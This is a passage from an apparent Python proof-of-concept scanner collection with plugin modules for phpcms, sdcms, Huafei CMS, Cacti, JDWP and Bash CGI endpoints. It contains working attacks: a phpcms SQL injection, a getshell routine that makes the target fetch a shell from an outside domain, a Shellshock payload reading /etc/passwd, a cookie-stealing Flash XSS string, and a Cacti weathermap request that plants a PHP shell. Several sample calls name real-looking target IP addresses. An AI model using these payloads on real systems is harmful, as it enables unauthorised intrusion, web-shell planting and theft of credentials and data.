    result['VerifyInfo']['level']=label
    result['VerifyInfo']['result'] =info

if __name__ == '__main__':
    # NOTE(review): a full URL is passed as ip (see the note in verify); the
    # value looks like a converter placeholder rather than a real target, and
    # the same call is simply repeated twice.
    print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
    print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')

#/root/github/poccreate/thirdparty/edusohocms/edusohocms_3d644fd5efb2fc076e04a786e1190083.py
#/root/github/poccreate/codesrc/exp-2193.py
-------------------------------------------------------------------------------- /cms/huaficms/__init__.py: --------------------------------------------------------------------------------
KEYWORDS = ['huaficms', ]
def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
    """Return True when the keyword 'huaficms' occurs in the page body or in
    the response headers.

    Only ``context`` and ``head`` are inspected; the other parameters belong to
    the shared rule signature and are ignored.  This is the template emitted by
    the converter's ``write__init__`` (the same shape appears for every
    cms/* package).
    """


    if 'huaficms' in context or 'huaficms' in head:
        return True
    else:
        return False
-------------------------------------------------------------------------------- /cms/huaficms/huaficms_c8eb9652690ea8366b0f4852d5aeaead.py: --------------------------------------------------------------------------------
#!/usr/bin/evn python
#-*-:coding:utf-8 -*-
#Author:404
#Name: Huafei Technology site-builder system — with JavaScript disabled the admin back end can be reached and administrators can be added
#Refer:http://www.wooyun.org/bugs/wooyun-2010-083888
# (The shebang reads "evn" rather than "env"; it is irrelevant when the file is
# imported as a plugin module, as the framework does.)

from ..miniCurl import Curl
from ..t import T

class P(T):
    """Huafei CMS admin-page exposure check (see the WooYun reference above).

    Follows the plugin contract of ``T``: ``verify`` returns a dict whose
    ``result`` key is False unless the admin page is served.
    """
    def __init__(self):
        T.__init__(self)
    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        """Request ``admin/User/manageadmin.aspx`` with no credentials
        supplied here and report a hit when the status is 200 and the body
        references ``addadmin.aspx``.

        Only ``ip`` and ``port`` are used; the remaining parameters belong to
        the shared ``T`` signature and are ignored (``productname={}`` is a
        mutable default from that signature and is not mutated here).

        Returns:
            dict with ``result`` (bool) and, on a hit, ``VerifyInfo`` as
            filled in by ``output``.

        Errors raised by ``curl.curl2`` are not caught; its failure behaviour
        is not visible in this file.
        """
        # ip is expected to be a bare host; a full URL (as in __main__ below)
        # produces "http://http://...".
        arg='http://'+ip+':'+port+'/'
        curl=Curl()
        result = {}
        result['result']=False

        # The probe is a single GET to the admin page, so it is visible as
        # such in the target's access log; a 200 for this path is what a
        # defender would alert on.
        url=arg+"admin/User/manageadmin.aspx"
        code,head,res,errcode,_=curl.curl2(url)
        if code==200 and 'addadmin.aspx' in res:
            output(url,result,'hole')


        del curl
        return result


def output(url,result,label):
    """Mark ``result`` as positive in place and attach the VerifyInfo record.

    Args:
        url: the request URL that produced the hit.
        result: the dict built by ``verify``; mutated, not returned.
        label: severity label stored under ``VerifyInfo['level']``.

    NOTE(review): ``payload`` holds the converter's output path on the
    author's machine, not the request that was sent (it matches the first
    trailer comment at the end of the file).
    """
    info = url + ' huaficms Vul '
    result['result']=True
    result['VerifyInfo'] = {}
    result['VerifyInfo']['type']='huaficms Vul'
    result['VerifyInfo']['URL'] =url
    result['VerifyInfo']['payload']='/root/github/poccreate/thirdparty/huaficms/huaficms_c8eb9652690ea8366b0f4852d5aeaead.py'
    result['VerifyInfo']['level']=label
    result['VerifyInfo']['result'] =info

if __name__=="__main__":
    # NOTE(review): a full URL is passed as ip (see the note in verify); the
    # value looks like a converter placeholder rather than a real target, and
    # the same call is simply repeated twice.
    print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
    print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')

#/root/github/poccreate/thirdparty/huaficms/huaficms_c8eb9652690ea8366b0f4852d5aeaead.py
#/root/github/poccreate/codesrc/exp-2647.py
-------------------------------------------------------------------------------- /cms/phpcms/__init__.py:
# --------------------------------------------------------------------------------
KEYWORDS = ['phpcms', ]
# Fingerprint hook: case-sensitive substring match on the response body or headers.
def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):


    if 'phpcms' in context or 'phpcms' in head:
        return True
    else:
        return False
# -------------------------------------------------------------------------------- /cms/phpcms/phpcms_v9_6.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-


from ..t import T

import requests
import random
import string
import hashlib
import re
import threading






class P(T):
    """phpcms v9.6 checks.

    verify()   - SQL-injection probe: a random two-digit marker is sent, and
                 the tail of md5(marker) is looked for in a follow-up page.
                 Reports only; nothing is written on the target.
    getshell() - NOT called by verify() or by the framework.  It is
                 intrusive (creates a member account on the target) and
                 depends on a payload hosted on a third-party domain; see
                 the method docstring.
    """
    def __init__(self):
        T.__init__(self)
    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        arg='http://'+ip+':'+port

        result = {}
        result['result']=False
        try:
            url1 = '{}/index.php?m=wap&c=index&a=int&siteid=1'.format(arg)
            s =requests.Session()
            # No timeout on any request in this block: a silent target can
            # hang the scanner indefinitely.
            req = s.get(url1)
            # Only two digits of entropy (00-99); the 16-hex-char suffix of
            # md5(flag) is what is matched below, so a coincidental match in
            # page content is unlikely but the marker is far weaker than it
            # needs to be.
            flag = ''.join([random.choice(string.digits) for _ in range(2)])
            flag_hash = hashlib.md5(flag).hexdigest()
            url2 = '{}/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28md5%28{}%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26'.format(arg,flag)
            cookie = requests.utils.dict_from_cookiejar(s.cookies)
            # [0] raises IndexError when no matching cookie was set; the bare
            # `except` below reports that as a generic 'requests error.'.
            cookies = re.findall(r"siteid': '(.*?)'",str(cookie))[0]
            data = {"userid_flash":cookies}
            r = s.post(url=url2,data=data)
            # Fixed offset into the raw Set-Cookie header: KeyError when the
            # header is absent, and a wrong slice as soon as the cookie name
            # or attribute layout differs from the author's fixture.
            a_k = r.headers['Set-Cookie'][61:]
            url3 = '{}/index.php?m=content&c=down&a_k={}'.format(arg,a_k)
            if flag_hash[16:] in s.get(url3).content:
                output(url3,result,'hole')

        except:
            # Bare except: swallows everything (including KeyboardInterrupt)
            # and hides the IndexError/KeyError cases noted above.
            print 'requests error.'
            pass

        return result




    def getshell(self,host):
        """Register a member on `host` with an injected <img> tag.  Not used by verify().

        Points a reviewer should weigh before this is ever run:
        - it is intrusive: it creates a member account on the target;
        - the image URL points at www.cnnetarmy.com, a domain the operator
          does not control, so whatever that host serves - now or later -
          is presumably what the target fetches (supply-chain risk for the
          operator as well as the target);
        - the extracted path is appended to sql_ok.txt in the current
          working directory;
        - all errors are swallowed by the bare except, so a failed run
          looks identical to a network error.
        """
        try:
            url = '%s/index.php?m=member&c=index&a=register&siteid=1' % host
            flag = ''.join([random.choice(string.lowercase) for _ in range(8)])
            flags = ''.join([random.choice(string.digits) for _ in range(8)])
            headers = {
                'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-Encoding':'gzip, deflate',
                'Accept-Language':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
                'Upgrade-Insecure-Requests':'1',
                'Content-Type': 'application/x-www-form-urlencoded',
                'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'}
            data = "siteid=1&modelid=11&username={}&password=ad{}min&email={}@cnnetarmy.com&info%5Bcontent%5D=%3Cimg%20src=http://www.cnnetarmy.com/soft/shell.txt?.php#.jpg>&dosubmit=1&protocol=".format(flag,flags,flag)
            r = requests.post(url=url,headers=headers,data=data,timeout=5)
            #print r.content
            # [0] raises IndexError when the response contains no img tag.
            shell_path = re.findall(r'lt;img src=(.*?)>',str(r.content))[0]
            print '[*] shell: %s | pass is: cmd' % shell_path
            with open('sql_ok.txt','a')as tar:
                tar.write(shell_path)
                tar.write('\n')
        except:
            print 'requests error.'
            pass
def output(url,result,label):
    """Mark `result` positive and fill in its VerifyInfo block in place.

    url    - the URL that produced the finding
    result - the dict returned by verify(); mutated, not copied
    label  - severity string consumed by the framework ('hole' above)

    'payload' is a hard-coded path from the author's machine, not the
    request that was sent.
    """
    info = url + ' phpcmsv9.6 Vul '
    result['result']=True
    result['VerifyInfo'] = {}
    result['VerifyInfo']['type']='sqlli inject'
    result['VerifyInfo']['URL'] =url
    result['VerifyInfo']['payload']='/root/github/poccreate/thirdparty/phpcms/phpcms_v9_6.py'
    result['VerifyInfo']['level']=label
    result['VerifyInfo']['result'] =info

if __name__ == '__main__':
    # Manual smoke test; `ip` is concatenated after 'http://' in verify(), so
    # passing a full URL here produces 'http://http://...'.
    print P().verify(ip='http://yunlai.cn:803/sfdsfds',port='80')

# -------------------------------------------------------------------------------- /cms/phpcms/t.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
# encoding: utf-8


class T(object):
    """Base class for every PoC module's P; each hook defaults to 'no finding'."""
    def __init__(self):

        self.result = {
            'type': None,
            'version': None,
        }
        self.keywords = []
        self.versions = []

    def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
        ##
        #head        - response headers returned by the target
        #context     - HTML body of the response
        #ip          - target ip
        #port        - target port
        #productname - component/product identified for the request
        #keywords    - keyword components known so far
        #hackinfo    - spare field




        return True
    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        # Default: nothing found.  Subclasses return the same shape and add
        # result['VerifyInfo'] on a hit.
        result = {}
        result['result']=False
        return result
    def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        result = {}
        result['result']=False
        return result
    def parse_output(self, result):
        # NOTE: the incoming `result` is discarded and a negative one returned.
        result = {}
        result['result']=False
        return result
# -------------------------------------------------------------------------------- /cms/sdcms/__init__.py: --------------------------------------------------------------------------------
KEYWORDS = ['sdcms', ]
# Fingerprint hook: case-sensitive substring match on the response body or headers.
def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):


    if 'sdcms' in context or 'sdcms' in head:
        return True
    else:
        return False
# -------------------------------------------------------------------------------- /cms/sdcms/sdcms_3114b79e6d650cbdbaf0e8f592f884ad.py: --------------------------------------------------------------------------------
#!/usr/bin/env
#*_* coding: utf-8 *_*

#name: swfUpload.swf|uploadify.swf flash xss collection
#author: yichin
#refer: http://www.wooyun.org/bugs/wooyun-2014-069833/
from ..miniCurl import Curl
from ..t import T

import md5


class P(T):
    """Known-vulnerable Flash uploader detection by response hash.

    Fetches one URL, md5-hashes the whole body and compares it against a
    fixed list of hashes of vulnerable swf builds.  Read-only: the reported
    URL carries the XSS marker but that URL is never requested here.
    """
    def __init__(self):
        T.__init__(self)
    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        arg='http://'+ip+':'+port+'/'
        curl=Curl()
        result = {}
        result['result']=False

        # md5 of the vulnerable swf files (per the refer link above).
        md5_list = [
            '3a1c6cc728dddc258091a601f28a9c12',
            '53fef78841c3fae1ee992ae324a51620',
            '4c2fc69dc91c885837ce55d03493a5f5',
        ]
        # NOTE(review): `arg` is the site root, not a .swf path, so this can
        # only match when the root itself serves one of the listed files.
        # The intent was presumably to request the uploader swf paths.
        code, head, res, err, _ = curl.curl2(arg)
        if code == 200:
            md5_value = md5.new(res).hexdigest()
            if md5_value in md5_list:
                output(arg + '?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss',result,'warning')
            else:
                #debug(arg + ' **_**' + md5_value)
                pass
        else:
            #debug(arg + '**__**not found')
            pass


        del curl
        return result


def output(url,result,label):
    """Mark `result` positive and fill in its VerifyInfo block in place.

    label is the severity string consumed by the framework ('warning' above);
    'payload' is a hard-coded path from the author's machine.
    """
    info = url + ' sdcms Vul '
    result['result']=True
    result['VerifyInfo'] = {}
    result['VerifyInfo']['type']='sdcms Vul'
    result['VerifyInfo']['URL'] =url
    result['VerifyInfo']['payload']='/root/github/poccreate/thirdparty/sdcms/sdcms_3114b79e6d650cbdbaf0e8f592f884ad.py'
    result['VerifyInfo']['level']=label
    result['VerifyInfo']['result'] =info

if __name__ == '__main__':
    # Manual smoke test repeated twelve times; see the note on `ip` in the
    # other modules - a full URL is passed where a bare host is expected.
    print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
    print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
    print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
    print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
    print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
    print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
    print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
    print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
    print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
    print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
    print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')
    print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')


#/root/github/poccreate/thirdparty/sdcms/sdcms_3114b79e6d650cbdbaf0e8f592f884ad.py
#/root/github/poccreate/codesrc/exp-1817.py
# -------------------------------------------------------------------------------- /cms/t.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
# encoding: utf-8


class T(object):
    """Base class for every PoC module's P; each hook defaults to 'no finding'."""
    def __init__(self):

        self.result = {
            'type': None,
            'version': None,
        }
        self.keywords = []
        self.versions = []

    def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
        ##
        #head        - response headers returned by the target
        #context     - HTML body of the response
        #ip          - target ip
        #port        - target port
        #productname - component/product identified for the request
        #keywords    - keyword components known so far
        #hackinfo    - spare field




        return True
    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        # Default: nothing found.  Subclasses return the same shape and add
        # result['VerifyInfo'] on a hit.
        result = {}
        result['result']=False
        return result
    def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        result = {}
        result['result']=False
        return result
    def parse_output(self, result):
        # NOTE: the incoming `result` is discarded and a negative one returned.
        result = {}
        result['result']=False
        return result
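# -------------------------------------------------------------------------------- /component/JDWP/JDWPvul.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
# encoding: utf-8
from t import T
import os
import platform
import subprocess
import signal
import shlex
import time
import requests,urllib2,json,urlparse

class TimeoutError(Exception):
    """Raised by command() when the child process outlives `timeout` seconds."""
    pass


def command(cmd, timeout=60):
    """Run a command and return its combined stdout+stderr as a string.

    cmd     - the command to run: a list of argv strings, or a single string
              which is split with shlex (POSIX quoting rules).  Either way
              the child is started with shell=False, so values that came
              from a scan target (ip, port, banner text) reach it as literal
              arguments and cannot be interpreted as shell syntax.
    timeout - max seconds to wait for; 0 waits indefinitely.

    Raises TimeoutError (the class above, not the builtin) after terminating
    the child - on Linux the whole process group, so grandchildren die too -
    and OSError when the executable cannot be found.

    Caveat: output is read only after the child exits, so a child that
    writes more than the pipe buffer blocks until the timeout fires.
    """
    if isinstance(cmd, basestring):
        argv = shlex.split(cmd)
    else:
        argv = list(cmd)
    is_linux = platform.system() == 'Linux'
    # setsid gives the child its own process group so killpg() below reaches
    # anything it spawned.
    p = subprocess.Popen(argv, stderr=subprocess.STDOUT, stdout=subprocess.PIPE,
                         shell=False, preexec_fn=os.setsid if is_linux else None)
    try:
        if timeout == 0:
            out = p.stdout.read()
            p.wait()  # read() returned on EOF; reap the child as well
            return out
        t_beginning = time.time()
        while p.poll() is None:
            if timeout and time.time() - t_beginning > timeout:
                if is_linux:
                    os.killpg(p.pid, signal.SIGTERM)
                else:
                    p.terminate()
                raise TimeoutError(cmd, timeout)
            time.sleep(0.1)
        return p.stdout.read()
    finally:
        # Always release the pipe, including on the timeout path where the
        # original leaked it.
        p.stdout.close()


class P(T):
    """JDWP exposure check.

    Launches script/jdwpshellifier.py (next to this file) against ip:port
    with a 40 s cap and reports a hit when the helper prints
    'Command successfully executed'.  All protocol work happens in the
    helper; this wrapper only starts it and parses its output.
    """
    def __init__(self):
        T.__init__(self)
    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        """Return {'result': bool[, 'VerifyInfo': {...}]} for the target ip:port."""
        result = {}
        result['result']=False

        script = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'script', 'jdwpshellifier.py')
        # argv list rather than a shell string: ip and port are passed to the
        # helper as literal arguments whatever characters they contain.
        usecommand = ['python', script, '-t', ip, '-p', port]
        try:
            print ' '.join(usecommand)
            msgresult = command(usecommand, timeout=40)
            print msgresult
            if 'Command successfully executed' in msgresult:
                result['result']=True
                result['VerifyInfo'] = {}
                result['VerifyInfo']['type']='Java Debug Wire Protocol vul'
                result['VerifyInfo']['URL'] =ip+':'+port
                result['VerifyInfo']['payload']='Java Debug Wire Protocol poc'
                result['VerifyInfo']['result'] =msgresult
        except Exception,e:
            # Exception has no `.text`: the original `print e.text` raised
            # AttributeError inside the handler, which the `return` in
            # `finally` then discarded, so failures were never visible.
            print e
        return result
if __name__ == '__main__':
    print P().verify(ip='120.24.243.216',port='8001')

# -------------------------------------------------------------------------------- /component/JDWP/__init__.py: --------------------------------------------------------------------------------
KEYWORDS = ['jdwp', ]
# Fingerprint hook: JDWP is not an HTTP service, so this matches on the
# service-fingerprint dict (`productname`) instead of on page content.
def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
    return ('jdwp' in productname.get('protocol','')
            or 'Java Debug Wire Protocol' in productname.get('productname',''))
# -------------------------------------------------------------------------------- /component/JDWP/t.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
# encoding: utf-8


class T(object):
    """Base class for every PoC module's P; each hook defaults to 'no finding'."""
    def __init__(self):

        self.result = {
            'type': None,
            'version': None,
        }
        self.keywords = []
        self.versions = []
    def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
        ##
        #head        - response headers returned by the target
        #context     - HTML body of the response
        #ip          - target ip
        #port        - target port
        #productname - component/product identified for the request
        #keywords    - keyword components known so far
        #hackinfo    - spare field




        return True

    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        # Default: nothing found.  Subclasses return the same shape and add
        # result['VerifyInfo'] on a hit.
        result = {}
        result['result']=False
        return result
    def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        result = {}
        result['result']=False
        return result
    def parse_output(self, result):
        # NOTE: the incoming `result` is discarded and a negative one returned.
        result = {}
        result['result']=False
        return result
# -------------------------------------------------------------------------------- /component/__init__.py: --------------------------------------------------------------------------------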
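# https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/component/__init__.py
# -------------------------------------------------------------------------------- /component/bash/__init__.py: --------------------------------------------------------------------------------
KEYWORDS = ['cgi', ]
# Fingerprint hook: any mention of a cgi-bin path in the spare field or the
# response body selects this package.
def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
    return 'cgi-bin' in hackinfo or 'cgi-bin' in context
# -------------------------------------------------------------------------------- /component/bash/bash.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
# encoding: utf-8
from t import T
import os
import platform
import subprocess
import signal
import shlex
import time
import requests,urllib2,json,urlparse

class TimeoutError(Exception):
    """Raised by command() when the child process outlives `timeout` seconds."""
    pass


def command(cmd, timeout=60):
    """Run a command and return its combined stdout+stderr as a string.

    cmd     - the command to run: a list of argv strings, or a single string
              which is split with shlex (POSIX quoting rules).  Either way
              the child is started with shell=False, so values that came
              from a scan target (ip, port, banner text) reach it as literal
              arguments and cannot be interpreted as shell syntax.
    timeout - max seconds to wait for; 0 waits indefinitely.

    Raises TimeoutError (the class above, not the builtin) after terminating
    the child - on Linux the whole process group, so grandchildren die too -
    and OSError when the executable (e.g. curl) cannot be found.

    Caveat: output is read only after the child exits, so a child that
    writes more than the pipe buffer blocks until the timeout fires.
    """
    if isinstance(cmd, basestring):
        argv = shlex.split(cmd)
    else:
        argv = list(cmd)
    is_linux = platform.system() == 'Linux'
    # setsid gives the child its own process group so killpg() below reaches
    # anything it spawned.
    p = subprocess.Popen(argv, stderr=subprocess.STDOUT, stdout=subprocess.PIPE,
                         shell=False, preexec_fn=os.setsid if is_linux else None)
    try:
        if timeout == 0:
            out = p.stdout.read()
            p.wait()  # read() returned on EOF; reap the child as well
            return out
        t_beginning = time.time()
        while p.poll() is None:
            if timeout and time.time() - t_beginning > timeout:
                if is_linux:
                    os.killpg(p.pid, signal.SIGTERM)
                else:
                    p.terminate()
                raise TimeoutError(cmd, timeout)
            time.sleep(0.1)
        return p.stdout.read()
    finally:
        # Always release the pipe, including on the timeout path where the
        # original leaked it.
        p.stdout.close()


class P(T):
    """Bash environment-variable injection check over a list of common CGI paths.

    Each path is requested once with curl; the probe lives in the User-Agent
    header.  Probing stops at the first positive, or at the first path that
    answers with something other than a 'not found' page.
    """
    def __init__(self):
        T.__init__(self)
    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        """Return {'result': False} or a positive dict for ip:port.

        On a hit VerifyInfo.URL names the path that actually responded; the
        original always reported /cgi-bin/test-cgi whichever path matched.
        """
        result = {}
        result['result']=False
        # Named `paths`: the original used `list`, shadowing the builtin.
        paths=['/cgi-bin/test-cgi','/cgi-bin/test.cgi','/cgi-bin/load.cgi', '/cgi-bin/gsweb.cgi', '/cgi-bin/redirector.cgi',
               '/cgi-bin/index.cgi', '/cgi-bin/help.cgi', '/cgi-bin/about.cgi', '/cgi-bin/vidredirect.cgi',
               '/cgi-bin/click.cgi', '/cgi-bin/details.cgi', '/cgi-bin/log.cgi', '/cgi-bin/viewcontent.cgi',
               '/cgi-bin/content.cgi', '/cgi-bin/admin.cgi', '/cgi-bin/webmail.cgi']

        try:
            for i in paths:
                # argv list handed to command() without a shell: ip/port are
                # literal arguments, and the probe string is a single argv
                # element exactly as the original's double quotes made it.
                usecommand = ['curl', '-A', '() { ignore;};echo;/bin/cat /etc/passwd',
                              'http://' + ip + ':' + port + i]
                shown = subprocess.list2cmdline(usecommand)
                msgresult = command(usecommand, timeout=3)
                print msgresult
                # Weak indicator: any response body containing 'root' counts,
                # so a hit should be confirmed by hand.
                if 'root' in msgresult:
                    result['result']=True
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['type']='bash vul'
                    result['VerifyInfo']['URL'] =ip+':'+port+i
                    result['VerifyInfo']['payload']=shown
                    result['VerifyInfo']['result'] =msgresult
                    break
                # Case-insensitive: the original's 'not found' never matched
                # a typical 'Not Found' page, so only the first path was ever
                # tried.  A response that is neither a hit nor a 404 means the
                # path exists and is not affected; stop probing.
                elif 'not found' not in msgresult.lower():
                    break
        except Exception,e:
            # Exception has no `.text`; `print e.text` itself raised inside
            # the handler.  A missing curl now surfaces here as OSError.
            print e
        return result
if __name__ == '__main__':
    # print P().verify(ip='61.146.115.83',port='81')
    print P().verify(ip='58.117.96.180', port='80')

# -------------------------------------------------------------------------------- /component/bash/t.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
# encoding: utf-8


class T(object):
    """Base class for every PoC module's P; each hook defaults to 'no finding'."""
    def __init__(self):

        self.result = {
            'type': None,
            'version': None,
        }
        self.keywords = []
        self.versions = []
    def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
        ##
        #head        - response headers returned by the target
        #context     - HTML body of the response
        #ip          - target ip
        #port        - target port
        #productname - component/product identified for the request
        #keywords    - keyword components known so far
        #hackinfo    - spare field




        return True

    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        # Default: nothing found.  Subclasses return the same shape and add
        # result['VerifyInfo'] on a hit.
        result = {}
        result['result']=False
        return result
    def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        result = {}
        result['result']=False
        return result
    def parse_output(self, result):
        # NOTE: the incoming `result` is discarded and a negative one returned.
        result = {}
        result['result']=False
        return result
# -------------------------------------------------------------------------------- /component/cacti/__init__.py: --------------------------------------------------------------------------------
KEYWORDS = ['cacti', ]
# Fingerprint hook: case-sensitive match on the product name in the body.
def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
    return 'Cacti' in context
# -------------------------------------------------------------------------------- /component/cacti/cactifiledisclosure.py: --------------------------------------------------------------------------------
#!/usr/bin/env python
# encoding: utf-8
from t import T

import requests,urllib2,json,urlparse
class P(T):
    """Check whether the Cacti schema dump (cacti.sql) is served from the web root."""
    def __init__(self):
        T.__init__(self)
    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        """Return {'result': False} or a positive dict for ip:port.

        Read-only: a single GET with a 2 s timeout.
        """
        target_url = "http://"+ip+":"+str(port)+"/cacti.sql"
        result = {}
        result['result']=False
        r=None
        try:
            r=requests.get(url=target_url,timeout=2)
            # A bare 200 was the original criterion; catch-all hosts answer
            # 200 for any path, so also require the body to look like the
            # SQL schema it claims to be.
            if r.status_code==200 and 'create table' in r.text.lower():
                result['result']=True
                result['VerifyInfo'] = {}
                result['VerifyInfo']['type']='cacti file disclosure'
                result['VerifyInfo']['URL'] =ip+"/cacti.sql"
                result['VerifyInfo']['payload']='IP/cacti.sql'
                result['VerifyInfo']['result'] =''
        except Exception,e:
            # Exception has no `.text`; the original handler raised on its own.
            print e
        finally:
            if r is not None:
                r.close()
        return result
if __name__ == '__main__':
    print P().verify(ip='140.114.108.4',port='80')
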
-------------------------------------------------------------------------------- /component/cacti/cactiweathermap.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | from t import T 4 | 5 | import requests,urllib2,json,urlparse 6 | class P(T): 7 | def __init__(self): 8 | T.__init__(self) 9 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 10 | target_url = "http://"+ip+":"+str(port)+"/plugins/weathermap/editor.php" 11 | result = {} 12 | result['result']=False 13 | r=None 14 | try: 15 | r=requests.get(url=target_url,timeout=2) 16 | if r.status_code==200: 17 | 18 | shell_url = "http://"+ip+":"+str(port)+"/plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_a rrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=Name" 19 | r=requests.get(url=shell_url,timeout=2) 20 | if r.status_code == 200: 21 | result['result'] = True 22 | result['VerifyInfo'] = {} 23 | result['VerifyInfo']['type'] = 'cacti weathermap code exploit' 24 | result['VerifyInfo']['URL'] = ip + "/plugins/weathermap/editor.php" 25 | result['VerifyInfo']['payload'] = 'IP/plugins/weathermap/editor.php' 26 | result['VerifyInfo']['result'] = r.text 27 | result['VerifyInfo']['shellurl'] ='plugins/weathermap/configs/test.php pass is 0' 28 | 29 | else: 30 | target_url = 
"http://"+ip+":"+str(port)+"/cacti/plugins/weathermap/editor.php" 31 | 32 | r=requests.get(url=target_url,timeout=2) 33 | if r.status_code==200: 34 | 35 | shell_url = "http://"+ip+":"+str(port)+"/cacti/plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_a rrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=Name" 36 | r=requests.get(url=shell_url,timeout=2) 37 | if r.status_code == 200: 38 | result['VerifyInfo'] = {} 39 | result['VerifyInfo']['shellurl'] ='/cacti/plugins/weathermap/configs/test.php pass is 0' 40 | result['result'] = True 41 | 42 | result['VerifyInfo']['type'] = 'cacti weathermap code exploit' 43 | result['VerifyInfo']['URL'] = ip + "/cacti/plugins/weathermap/editor.php" 44 | result['VerifyInfo']['payload'] = 'IP/cacti/plugins/weathermap/editor.php' 45 | result['VerifyInfo']['result'] = r.text 46 | except Exception,e: 47 | print e.text 48 | finally: 49 | if r is not None: 50 | r.close() 51 | del r 52 | return result 53 | if __name__ == '__main__': 54 | print P().verify(ip='140.114.108.4',port='80') 55 | -------------------------------------------------------------------------------- /component/cacti/t.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | 5 | class T(object): 6 | def __init__(self): 7 | 8 | self.result = { 9 | 'type': None, 10 | 'version': None, 11 | } 12 | self.keywords = 
